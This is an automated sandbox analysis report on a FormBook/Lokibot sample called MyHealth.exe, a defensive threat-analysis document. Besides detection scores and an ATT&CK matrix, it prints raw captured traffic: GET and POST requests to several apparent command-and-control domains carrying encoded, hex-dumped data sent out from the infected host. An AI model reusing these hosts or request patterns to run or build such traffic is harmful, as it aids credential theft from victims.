Play interactive tourEdit tour

# Analysis Report MyHealth.exe

## Overview

### Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook Lokibot

### Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false

 Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
 Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
 Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

### Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Masquerading1Credential Dumping1Virtualization/Sandbox Evasion12Remote File Copy3Email Collection1Data Encrypted1Standard Cryptographic Protocol12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaGraphical User Interface1Port MonitorsAccessibility FeaturesSoftware Packing1Network SniffingProcess Discovery2Remote ServicesMan in the Browser1Exfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionVirtualization/Sandbox Evasion12Input CaptureSecurity Software Discovery221Windows Remote ManagementData from Local System1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection512Credentials in FilesRemote System Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol15SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessDeobfuscate/Decode Files or Information1Account ManipulationFile and Directory Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceSystem Information Discovery13Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features

### Signature Overview

#### AV Detection:

 Multi AV Scanner detection for submitted file Show sources
 Source: MyHealth.exe Virustotal: Detection: 68% Perma Link Source: MyHealth.exe Metadefender: Detection: 45% Perma Link Source: MyHealth.exe ReversingLabs: Detection: 64%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 0.2.MyHealth.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 16.0.jj0t1be8.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 14.2.jj0t1be8.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 17.0.jj0t1be8.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 2.0.MyHealth.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 15.2.jj0t1be8.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 14.0.jj0t1be8.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 0.0.MyHealth.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen Source: 15.0.jj0t1be8.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen

#### Networking:

 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=PcDZAYiJMyi1sNPMwoDVqsoC1cthxoAbOhKng71B3qX+ijDUh+XAYLydGv6YiAGIrKQP&GVm=4hedNPC8WB6p HTTP/1.1Host: www.kiheielectricbikes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=K42Ma8CsrX67CksjQH12R0Ttz7K+7j+uYmNE91+lE2r7D1u+oYQSBjHsLCqRW2+VsJ6V&GVm=4hedNPC8WB6p HTTP/1.1Host: www.3365ssr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=GyxwCZ1M+WopjQK5e9tGW3/PGaHjfFVHL5opZNL+ev8OmAkRdzMLOIFVrphwPYji8i11&GVm=4hedNPC8WB6p HTTP/1.1Host: www.sebasview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20&GVm=4hedNPC8WB6p HTTP/1.1Host: www.michalshahar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=sem+50/0YH3mEWESa99Xfx4+r5czIuNqkkKFb8xjbyQB4/frawbs3iCD49k7i6p7/qu6&GVm=4hedNPC8WB6p HTTP/1.1Host: www.nacemo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=chA0yBmUTNqQLPZwVUvzar2BiddoiQLWjuJCjqNw20a2YkZ8Mux+jO9XQqSfhLpE4lVG&GVm=4hedNPC8WB6p HTTP/1.1Host: www.workingtechnologiesmexico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 204.11.56.48 204.11.56.48
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 JA3 SSL client fingerprint seen in connection with other malware Show sources
 Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.frawgboy.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.frawgboy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frawgboy.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 54 73 56 6b 38 52 38 55 44 4d 64 5f 6a 76 7a 4b 71 6f 44 46 72 67 51 4c 51 41 56 50 66 52 49 33 5a 55 44 50 51 5f 33 59 47 48 6d 76 4a 78 54 70 42 48 54 5f 70 64 36 55 38 58 68 35 45 31 79 5f 33 6a 4b 4c 51 6c 52 4e 37 37 6d 4b 75 65 48 48 36 74 6a 47 71 6c 36 30 39 41 47 57 30 52 57 6b 66 79 47 4d 62 2d 79 6f 6e 66 57 45 45 5a 67 6d 7e 73 31 76 74 50 4b 70 41 6c 6c 2d 49 79 65 61 41 35 45 52 47 4d 61 55 73 73 49 76 37 4b 7a 5a 63 6e 79 54 4c 53 33 36 56 65 67 44 77 78 4b 70 71 52 4e 54 57 75 72 4b 49 69 74 4a 46 46 6c 41 56 47 6b 61 68 4c 44 53 4d 72 6a 49 5a 50 45 34 7a 45 6e 57 69 5f 42 58 56 36 71 39 68 74 63 6d 68 70 45 4a 61 39 79 63 56 61 42 57 76 54 67 42 4b 56 46 79 75 4d 79 42 61 4e 37 79 4e 47 45 65 79 72 79 72 56 64 55 33 6e 44 57 76 35 49 35 68 31 49 50 32 55 4a 49 74 65 4c 36 65 75 61 61 67 58 53 69 54 52 73 73 5a 66 4a 69 41 35 33 77 69 4d 48 44 79 66 70 77 75 39 5f 67 55 67 38 45 79 62 59 54 79 43 4a 63 65 5a 6e 47 5f 58 6b 36 50 78 47 70 54 58 5f 4d 4c 72 66 73 4e 73 38 56 31 4e 30 77 77 76 44 33 78 6d 4b 51 52 5a 4e 77 4c 6c 32 31 66 4f 53 72 30 51 52 62 4f 6a 30 66 61 65 43 53 46 66 68 37 6b 74 65 52 59 57 44 66 5f 57 5a 6f 78 76 74 38 63 33 54 35 76 28 71 32 63 65 31 41 62 48 6f 34 57 36 34 74 51 6c 52 62 4d 76 43 46 61 44 53 78 41 4c 54 79 6f 62 62 45 76 38 31 70 62 4b 43 65 59 35 34 41 32 76 30 72 32 34 61 33 58 4a 52 68 39 6a 45 66 66 55 6c 31 76 4f 30 64 6b 68 37 34 48 68 44 69 2d 46 79 36 6b 48 34 76 6d 42 59 68 4c 57 63 78 68 49 62 67 6c 7a 44 50 77 39 55 30 62 65 42 4b 49 51 52 62 69 4b 37 6c 55 49 35 79 7a 76 4b 69 71 6f 61 51 45 48 70 43 4a 77 79 43 38 7e 68 49 66 44 34 71 41 4a 43 58 4d 37 6f 7e 32 76 2d 67 71 56 6b 42 63 54 64 58 52 74 56 4b 43 71 4a 34 70 7a 54 41 63 35 62 6c 6d 6c 77 38 70 7e 58 78 2d 56 43 4f 34 52 6f 34 38 59 49 71 55 76 37 50 4a 68 50 76 75 34 54 39 6d 6f 2d 46 2d 77 34 34 2d 76 51 54 6f 68 76 39 2d 36 49 47 7a 50 6c 59 66 70 41 6a 63 63 6d 30 37 47 4a 77 4c 42 76 68 5f 32 53 38 44 53 71 50 54 69 66 6e 74 79 39 44 38 74 41 71 42 7a 5f 49 4f 4b 2d 4c 44 4c 48 50 48 43 4d 62 70 35 53 31 44 53 58 45 4b 4b 79 6e 58 59 66 58 4d 58 46 30 6f 50 6a 63 44 66 31 32 52 75 4d 45 6c 6d 78 6f 65 61 42 43 79 42 77 53 52 6d 53 31 32 39 53 6c 47 76 53 46 46 46 47 41 75 46 73 75 4a 75 5a 44 6c 7e 57 7a 30 71 42 57 73 68 4a 78 4e 78 4c 53 4a 71 5a 58 4f 50 35 69 71 6d 4f 37 4d 58 64 4a 55 52 5f 37 52 4a 6c 30 43 54 31 66 51 6b 32 78 30 41 4a 51 30 45 48 6a 49 44 79 4a 55 4c 41 54 61 6a 77 6c 75 54 38 55 46 35 72 58 49 30 6c 63 63 4a 41 55 4b 31 64 5a 6a 74 66 4d 4a 6f 47 6a 70 71 6c 39 6f 72 63 52 59 6f 5 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.kiheielectricbikes.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.kiheielectricbikes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kiheielectricbikes.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 48 2d 50 6a 65 2d 4c 53 54 33 54 50 31 38 66 46 79 63 71 53 6f 6f 4d 62 37 4f 68 79 77 6f 41 43 65 47 48 56 39 59 70 67 6b 34 53 34 74 67 54 53 73 5f 6d 72 54 2d 57 63 52 39 72 53 72 53 69 63 33 4a 56 66 70 4c 62 44 79 39 59 46 32 6a 70 6b 64 47 77 71 66 6e 47 73 6a 74 4a 4a 64 79 50 32 77 4a 54 4a 76 2d 54 79 4b 31 54 70 42 49 4f 38 76 53 54 2d 49 5f 5a 58 30 6c 62 4b 47 4d 4b 4b 58 50 4d 41 70 69 36 39 50 56 4c 49 73 6f 77 56 56 68 4e 73 73 31 47 31 5a 53 68 53 62 57 59 4f 30 50 37 41 6f 6d 4f 68 69 66 66 55 56 73 55 30 48 48 35 54 51 6a 68 69 37 46 37 62 72 32 65 46 7e 4b 28 43 78 30 4d 6c 70 38 31 52 74 4a 66 51 32 78 28 5f 44 52 75 31 50 70 30 38 46 69 77 64 6e 38 46 6e 78 57 79 70 72 31 50 45 6e 75 32 44 67 59 61 4a 6c 68 71 75 71 72 56 47 6e 74 63 50 50 64 33 39 49 72 66 32 50 5f 4f 70 4a 67 37 4e 4a 59 28 44 35 49 72 55 6e 5a 73 4b 4a 31 73 70 39 36 38 75 74 69 64 4b 38 34 50 39 77 53 55 4d 75 4d 51 58 39 6e 78 45 37 31 72 6a 30 42 33 4e 6c 67 63 6b 57 68 4e 44 76 78 67 72 6e 4e 71 71 67 38 49 6e 59 45 61 64 36 31 4d 6f 35 76 47 6d 52 48 4a 75 31 4b 34 45 79 67 6e 65 55 61 6c 6f 57 50 43 67 74 4e 71 4f 36 55 61 75 65 66 39 69 4a 6d 42 4b 37 33 78 77 48 39 4e 65 43 35 63 43 4c 41 64 61 54 38 42 44 58 62 4c 74 67 30 51 6c 69 6a 49 64 65 4f 7a 66 56 74 63 6a 38 62 6e 54 36 54 73 55 63 36 78 69 67 4f 74 4f 4d 39 67 57 62 57 61 6b 6f 6c 46 39 33 36 5a 4f 63 44 44 34 66 30 46 74 39 36 62 64 4e 42 42 69 34 31 68 63 64 6f 67 79 36 7a 72 61 35 43 63 39 4d 6a 46 6c 76 45 46 5a 53 64 5a 41 31 42 64 4d 6f 66 5a 6e 66 39 37 58 74 67 53 67 46 6b 6a 4c 44 70 6e 71 4b 73 75 44 59 30 31 68 65 6e 77 57 50 6f 48 64 47 46 63 42 58 2d 6e 39 43 59 33 62 78 4f 55 7a 4f 39 57 59 66 42 43 47 4a 63 7e 74 7e 73 64 6e 28 59 39 6a 28 77 70 77 48 41 36 4f 31 63 42 36 6c 64 62 57 28 76 65 43 28 59 30 32 6a 39 65 38 66 37 67 52 78 73 63 47 78 42 67 38 66 63 76 6d 6e 4c 28 70 64 44 72 6d 42 6c 44 78 54 62 4a 6b 34 78 45 6b 68 72 61 4a 7a 6c 76 53 43 70 42 4c 4c 55 6b 4c 4b 41 6e 43 74 4c 45 54 48 6e 56 72 51 4e 4c 48 68 6f 57 76 28 32 34 33 54 38 66 74 63 5f 48 61 4c 4c 62 77 6e 6a 6f 4c 72 53 36 36 35 47 48 57 28 65 5a 71 39 59 74 67 6c 71 58 66 48 6e 37 31 70 46 55 4c 78 35 51 4d 44 70 35 34 74 67 32 72 48 39 28 4d 63 52 6c 57 73 34 61 34 63 78 31 6b 61 63 7a 58 32 37 61 70 33 4a 7a 75 52 6a 53 5a 38 39 31 36 50 59 53 33 44 61 4e 31 4f 52 69 43 39 54 48 67 51 48 62 56 45 52 62 48 6d 4c 67 6c 35 63 79 6c 6b 4f 78 4c 61 39 55 75 31 32 53 61 7e 77 35 5f 7a 41 5a 75 57 38 6c 76 61 70 4c 43 75 33 52 6c 64 35 76 53 6c 55 50 78 39 6c 34 7 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 